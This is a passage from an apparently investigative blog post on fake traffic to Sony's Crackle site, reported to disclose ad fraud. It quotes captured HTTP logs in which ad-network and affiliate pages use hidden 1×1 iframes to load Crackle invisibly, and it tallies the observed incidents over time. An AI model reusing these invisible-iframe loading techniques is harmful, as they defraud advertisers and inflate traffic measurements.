</SCRIPT><div style=”position:absolute;left:0px;top:0px;visibility:hidden;”><img src=”http://g.adspeed.net/ad.php?do=imp&zid=0&aid=82611&auth=0DB7FD0BC9&wd=1280&ht=800&cb=1271223799″ alt=”i” width=”1″ height=”1″ /></div></body></html>

The net effect was to load the Crackle site completely invisibly. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.

Example 3: Yahoo Right Media, Extreme-sportsonline, Hotbizguide Double Invisible (1×1) IFRAMEs Load Crackle Invisibly

In testing of April 13, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to Extreme-sportsonline (green) which included a 1×1 IFRAME (grey) passing traffic to Hotbizguide (pink). Hotbizguide returned two separate 1×1 IFRAMEs (red) loading Crackle (blue)

GET /BhkG9KftZrBezVPLOKuGW5pr4LRA.html HTTP/1.1 …
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJGEgAAAAAAARoEwAAAAAAAgA0AAIAAAAAAP8AAA ADChe4GAAAAAAASncaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYA AAAAAAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHyzysEFgNCMHLNiu.ziQAnw9Ws9ezWVJH53CoAAAAAA==,,…
Host: search.extreme-sportsonline.com …

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 13:37:58 GMT

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html ; }
function trigger() { step++; if(step==max_steps){ load_content(); } }
</script>
<div id=”inifrcode”></div>
<iframe src=”http://search.hotbizguide.com/66682d5b6048f47cf70e56deb9989bb1.php” marginwidth=”0″ marginheight=”0″ hspace=”0″ vspace=”0″ frameborder=”0″ scrolling=”no” width=”1″ height=”1″ onload=”trigger();”></iframe><!–inifrcode–>
<div id=”stuff”></div>
<div id=”stuff1″></div>
<div id=”innercode”></div>
</body>
</html>

GET /MTNkyUL9SGHUGOPKuJJ7uj3AOWuN.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://search.mobilegamesearch.com/NgVbJ4eWaW7bMt57RcZVGMggRW9t.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: search.hotbizguide.com
Connection: Keep-Alive
Cookie: PHPSESSID=a8qbtgec2k79fd8c6onqp5k3q6

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 13 Apr 2010 21:45:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trkid=…; expires=Fri, 16-Apr-2010 21:45:49 GMT

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html >iframe src=”http://crackle.com/c/A_River_Runs_Through_It/?cmpid=728width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″></iframe>
<iframe src=”http://crackle.com/c/The_Beast/?cmpid=692width=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″></iframe>
<!–customcode–>

The net effect was to load the Crackle site completely invisibly, twice. Here too, the Crackle site returned comScore and ScorecardResearch tags as detailed in example 1.

A Long-Term Problem

To confirm the scope of Crackle’s invisible and forced-visit traffic and to evaluate trends over time, I searched logs preserved by my Automatic Spyware Advertising Tester. My tester records the URLs of pages loaded by the spyware-infected virtual computers, but my tester never intentionally visited the Crackle site, nor did my tester ever prompt or provoke traffic to Crackle in any way. So if my tester observes traffic to Crackle, that traffic must have occurred unrequested — invisibly or, at best, through a spyware popup or popunder.

The following table summarizes my tester’s observations of traffic to Crackle:

Month Number of observations of
traffic to Crackle.com
Q1 2009
15
Q2 2009
57
Q3 2009
95
Q4 2009
31
Q1 2010
51
April 2010 (month to date)
74

Although my testing methods have changed over time (e.g. to test new spyware), my testing intensity has remained constant. I have no specific reason to expect that adjustments to my methods would be more or less effective at uncovering Crackle incidents. I therefore tend to attribute month-to-month changes to changes in the intensity with which Crackle’s partners purchase invisible traffic and other tainted traffic on Crackle’s behalf. In my experience, most traffic-buyers run on-and-off campaigns — buying traffic for a time, then taking a break. If Crackle’s traffic buying followed a similar approach, spikes would be expected.

In any event, invisible and forced-visit traffic to Crackle cannot be written off as a short-term anomaly. Quite the contrary, my tester’s observations confirm that these problems have persisted for many months.

Implications and Next Steps

Advertisers buying placements on Crackle reasonably expect high-quality traffic. For example, the first clause of Crackle’s “About” page boasts that Crackle is owned by Sony, and Sony’s size and wealth provide a level of accountability that smaller video sites cannot offer. Nonetheless, my observations confirm that some placements on Crackle are entirely worthless.

Crackle may blame its tainted and invisible traffic on traffic brokers, affiliates, and other external forces. But traffic-buying inevitably invites exactly these shenanigans. If Crackle intends to buy traffic, it should better vet its partners — including confirming partners’ bona fides, overseeing partners’ specific methods, and developing procedures to hold partners accountable for any shortfalls. I’ve seen no sign of any such efforts. If Crackle can’t buy traffic with the requisite skill, perhaps Crackle would do better by ceasing to buy traffic at all.

Crackle traffic rank from Alexa - April 2010Three years ago, I posted How Spyware-Driven Forced Visits Inflate Web Site Traffic Counts, pointing out that cheap spyware and popup traffic can increase measurements of web site popularity. Users at least see those spyware popups, giving some nugget of rationale for resulting traffic figures. But users cannot even see the Crackle site when it is loaded invisibly as detailed above. Nonetheless, invisible site-loads are still likely to inflate measurements of Crackle’s traffic. For example, during the first few days of April 2010, my tester observed rampant fake traffic to Crackle — and Alexa simultaneously reported a major spike in Crackle’s traffic. (See image at right.) Furthermore, with comScore tags embedded in each Crackle impression, comScore systems receive a report each time Crackle’s site is loaded. Indeed, such reports come from a large number of distinct IP addresses — seemingly confirming that the traffic is legitimate. Can comScore successfully recognize and discount invisible loads of the Crackle site? If not, comScore will join Alexa in overstating Crackle’s popularity.

My bottom line? Buying traffic is a dirty business — so many sellers who provide worthless traffic, and so many buyers who use too little care in selecting and assessing the traffic they buy. As it stands, advertisers and networks doing business with Crackle risk paying for ads users cannot see. Plenty of small-time video sites play these games, but it’s disappointing to see a Sony site stoop to that level.